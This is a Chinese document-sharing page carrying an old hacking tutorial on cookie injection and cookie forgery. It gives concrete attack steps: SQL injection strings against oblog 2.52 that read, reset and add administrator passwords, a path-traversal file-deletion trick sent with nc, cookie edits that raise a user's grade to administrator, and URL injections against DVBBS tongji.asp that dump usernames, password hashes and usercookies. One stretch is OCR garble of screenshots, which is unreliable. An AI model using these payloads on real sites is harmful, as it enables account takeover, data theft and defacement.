版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、查找关于 COOKIES 入侵的方法及工具Cookies 是一小段提请存储在您的计算机硬盘上的文本。当获得您的同意后,浏览器将会 把此段文本存储到一个小文件中。如果您将浏览器设定为在接收Cookies 之前给予提示,您在访问 网站时将会注意到希望在您的计算机上放置Cookies 的请求,其目的是通知我们您何时访问了我们的网站。这个 Cookies 本身只是告诉我们一为过去的访问者再次访问了 网站,而 不会提供有关您的电子邮件地址或您是谁等信息。 当然,您可以选择通过注册在以后某个时 候告诉我们这些信息。cookies 就是网页放在你的电脑中的一些文件,由网页脚本语言控制生成删除修改访问查 阅判
2、断,有一定的时效性(程序中规定) 。一般打开是乱码。怎么察看 cookies ?第一种办法:在ie里有一个“导入导出功能”,可以将你的cookies导出到一个自己定义的 文件,可以是 txt第二种方法:下载一个叫做 cookies 察看器的小工具,即可以修改删除察看 cookies 文件。第三中办法:用 request.cookies(item)来访问cookies中的值。利用 cookies 进行注入:在程序中一些程序需要读取客户浏览器中的cookies来进行程序的判断,有的时候程序没有对读取的 cookies 进行过滤或者是判断,导致直接把 cookies 中的一个键的值直接提交到数 据库
3、执行。 cookies 是在我们客户端的,所以随便你怎么改都可以。在网页程序执行的时候 直接把 cookies 中的值没有经过过滤和检查是一种非常危险的事情。伪造 cookies:在程序的执行中,有的系统是用cookies来读取用户名和密码来进行访问端的身份判断(http是一种无状态协议) ,在我们通过注入或者是下载数据库读取用户名和密码成功后,可以直 接修改cookies,把相应的用户名和密码和权限值代替默认的cookies中的用户名和密码和权限,意思是当你以一个普通用户登陆的时候,系统给你的电脑生成了一个cookies,其中包括了你的用户名密码权限(普通) ,当你得知了管理员或者其他用户用
4、户名和密码和权限特征 时候可以直接修改cookies,把你的相应的值替换成关键用户的值,这样系统就认为你是真正的那个管理员。软件简介: oblog2.52 的 cookies 欺骗入侵由于 oblog2.52 中的 inc/function.asp 文件中的 checkuserlogined() 函数对 password 没 有过滤就放到了 sql 语句执行导致了 sql 注入,最明显的是 a' or 'a'='a 漏洞,在 function.asp 还有两个函数 codeCookie() 是加密用户名和密码的, decodeCookie() 是解密, 如果是m
5、ssql,可以导致后台更改管理员密码和添加管理员等等。0dca22a731e30058'理员密码and 1<(select userpassword from user where use rid=1)- 暴管0dca22a731e30058'username='admin'0dca22a731e30058'update user修改管理员密码insetset userpassword='0dca22a731e30058'whereintoadmin(username,password)values( '9xiao '
6、;,'0dca22a731e30058') - 加管理员,上面三个语句需要运行code cookie 加密后在 review 修改 cookies好久没有做动画嘿嘿,今天有些时间做个最新的 oblog2.52 的 cookies 欺骗,把 a' or a'=' a 加密,在 password 中修改,嘿嘿进前台了,这个版本还有一个删除任意文件的漏洞,动画在网上已经出了,偶简单说下,抓包,在文件名那地方利用./ 来指定你要删除的文件比如 ./index.asp修改好后用 nc 提交就可以了, 本来演示提权的没有找到 mssql 版的,就算了。软件名称 :c
7、ookies 再次利用入侵cookies 再次利用入侵 这次我们用明小仔的旁注工具修改COOKIES思路: 先找管理员名 :landi 应该是他了 >>>像上次一样,再修改用户名 >>>再修改等级 在网上闲逛,无意中试下,竟然入去了 就是他 看下去 我们先注册 , 用户名: kker 密码: 789800 登陆 , 现在的等级为:小说输入员这是 KKEF用户的 COOKIES:ASP.NET_Sessionld=tnkstw551m01xk55qm351prj; stat123=yes; UserInfo=username=kker&grade=1会
8、员 ID :landi会员等级 : 小说输入员 都还是这个小等级 我们再看看 grade=1 等级 =1是的小说输入员 我们来改一下 会员 ID :landi会员等级 : 小说审核员 现在等级高了 再改会员 ID :landi会员等级 : 管理员 呵呵,管理员啊 ASP.NET_SessionId=tnkstw551m01xk55qm351prj;stat123=yes;UserInfo=username=landi&grade=3呵呵,现在可以挂代码 ,我们进入管理中心,看行不行都还要密码,我们再欺骗'挂代码,完论坛入侵目前网上有种新的趋势, 黑客们的攻击目标开始从网站延伸到
9、论坛和聊天室及留言板等 公共场所,而许多用户的论坛密码竟然与 E-mail 和 QQ 的密码完全相同,因此对大家的网 络安全威胁非常大。 换个角度来说, 黑客们通过入侵这些地方,可以得到更高的权限。 比如 通过 80 端口进行渗透入侵,甚至于还可以得到论坛和聊天室、留言板等服务主机的最高权 限,是不是很可怕?许多人以为只有黑客高手才能做到这一点,其实不然, 只要简单的几步,连菜鸟都能得到论坛或聊天室及留言板的一切! 本文将以常见的论坛为例, 谈谈主要的论坛 攻击方法和防范手段。以动网先锋论坛为例。 最近该论坛出现一个漏洞, 使得普通用户可以轻松地获得论坛中 任意用户的密码, 包括管理员在内!
10、由于其 tongji.asp 文件没有过滤用户提交 SQL 查询的输 入,导致远程攻击者可以利用这个漏洞进行 SQL 攻击,进而威胁论坛或服务器安全。注意, 该手段对DVBBS VER 6.0.0 及6.0.0 SP1、SP2都有效,对低版本的动网论坛也有效,而且 无论数据库是 ACCESS 还是 MS SQL 都通吃。3 ht Ip://bbs/1 ongj i.(i»p?ordcr«2.xn® im(v ieo) emo) xa(d «»(b>丿 iS 0«* <«» e C3 El4Q
11、hupiww L_XcnAb<Aw<j5?o*“"21JM0匸 0斡尸 JSEdocument writeC ).小);document writeC )4i“ 小(atv).4>cw«atar&ur).document, write C LI 山<3 ”w>r).4eeji);document, writeC )“c ”八“无心厶"“).document, writeC 口 i.axwz).document, wri teC ).3<联).document, writeC 1*“”八“讥).docusiftnt
12、1; wri te (尸八"厲*?対wrior).document, writeC”八).docuD&nt* wr i te ( 庆4.伙q «ti“c),document, wri te C ,4-.从”心(*).document, writeC 口«rit.r).docuiDcnt« write( 匚)泣”八 了.4«q «ri<«r);document, writeC.小 ”*( t,关 >”八“3 ht t p:/w*/bba/1 ongj i. iiHp?ordcrg"2.
13、. .X«® 1M(1) 1*0) entO) XA(D Mft(E>o肚 > is) B tXR” ««* e«» e ra ElT二.*)httpi/wv.U.-w 73cn/bb</tmcji.Mp?or<lerss2A*B10K20uff«rclasf * QHMdocument, write(F “”31) .document writeC w 的 tM()* ) .document, writeC“讥tfe);'),doc uroent. write C “fiW6LcjQwrZ,
14、).document. writeC 口).< ”八毛上1) .document, writeC )“帜 w* 遺)耐皿').document writeC 口“i小1) .document, writeC 口 )p.a ”八乂9) .document. writeC”ww±lr);“cweM1 ) tdocument. writeC"(mr)k* ) .document. writeC )*“,”八"礙宇上屮讥1) .document. writeC ).珀叭八宇Q|>;4m ”八,).document, writeC 口二 仏*环创寸
15、9;).document writeC 机 “w車丄ir);4ecw<M muc3 h l I p : / WWW.& 聃i>Vo jnj c r fi玄样叩 *叨 X*卯啊ZA(pitiQ回确。0T0 e«* 倂.E1hh *L ai/b4>i/<«nf ji« s%fih貫戸SUhiOMSDuxiii血 -L dcciiiocnt wri te ( ,document, wri te < h dociunent. *ri te ( ,docmoent wri te( L dccinuent. irr i te ( ,dcc
16、ument. write( ,document. >ri te( ,dGCiimrnt. wri te ( h dotinnent, wr i te ( ,docujpent, wr i tr : ,dociuMnt, wr i te ( ,dotLun*ntn »ri te ( ,dccixcent. wri t e ('docuznent. write C !.! h * i I"-, -lIF lit 丄ZJ I1 上° ) :,ifecv-ralwt i s 叮'4« vm%e imIrt.rw攻击方法为:找到你的目标论坛,
17、然后输入其网址,假设为 http:/www.target.eom/asp/dvbbs/i ndex.asp,然后查询管理员的名字,每个论坛中都有这样的人,记住该人的论坛ID。接着在浏览器地址栏中输入: http:/www.target.eom/dvbbs/tongji.asp?orders=2&N=10,注意 “ N= ” 后面你可以随意写上任何数字,它表示你想查询几个论坛用户,回车即可看到该论坛的用户名(如图1 )。看到其中的管理员的名字了吗? 0K,接下来在地址栏中输入 a http:/www.target.eom/dvbbs/tongji.asp?orders=2&N=1
18、0%20userclass,”,这样就会查到这些人在论坛中的身份(如图2),注意其中的管理员身份的人,他具有最高权限,黑客的目标就是他。下一步,请在地址栏中输入 a ”,回车后在你看到的窗口中(如图3)记住管理员的ID在论坛中是第几位注册用户,假设为1。再下一步,在地址栏中输入a http:/www.target.eom/dvbbs/tongji.asp?orders=2&N=10%20userpassword,”,这样你就会看到论坛中用户的密码(如图4),可惜是经过 MD5加密处理的,但这已经足够了。最后再输入"”,回车后在出现的窗口中(如图5)记下管理员的usercookies的值,一般为0。好了,到现在黑客就得到管理员的Cookies的内容了,他可以通过在本机中伪造管理员的Cookies来入侵论坛。如果你输入“”,还可以得到论坛中用户忘记密码时的密码提示问题,输入“ ngji.asp?orders=2&N=10%20a nswer,” 可以得
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 医学26年老年主动脉瓣狭窄查房课件
- 低层酒店设计案例
- 健康管理对患者评估干预
- 煤矿安全教育
- 豪斯翻译质量评估模式
- 科学教育活动的意义
- 罗伊模式护理颅脑损伤血钠紊乱
- 产品设计核心要素解析
- 美丽拼音教学课件
- 酒店节日活动策划方案
- 2026云南玉溪通海县供销合作社社有企业招聘4人考试参考题库及答案解析
- 五月志愿服务课件:青春建功新时代 志愿奉献谱华章
- 堆与堆排序课件
- 破碎岩石施工方案(3篇)
- GB/T 17889.7-2026梯子第7部分:可分离式平台梯
- 建筑工程进场材料、构配件和设备质量控制工作标准
- JCT908-2013 人造石的标准
- GB/T 10857-2005S型和C型钢制滚子链条、附件和链轮
- 高大支模架工程监理实施细则
- 科技论文写作与学术规范
- 第6章-马尔可夫预测方法课件
评论
0/150
提交评论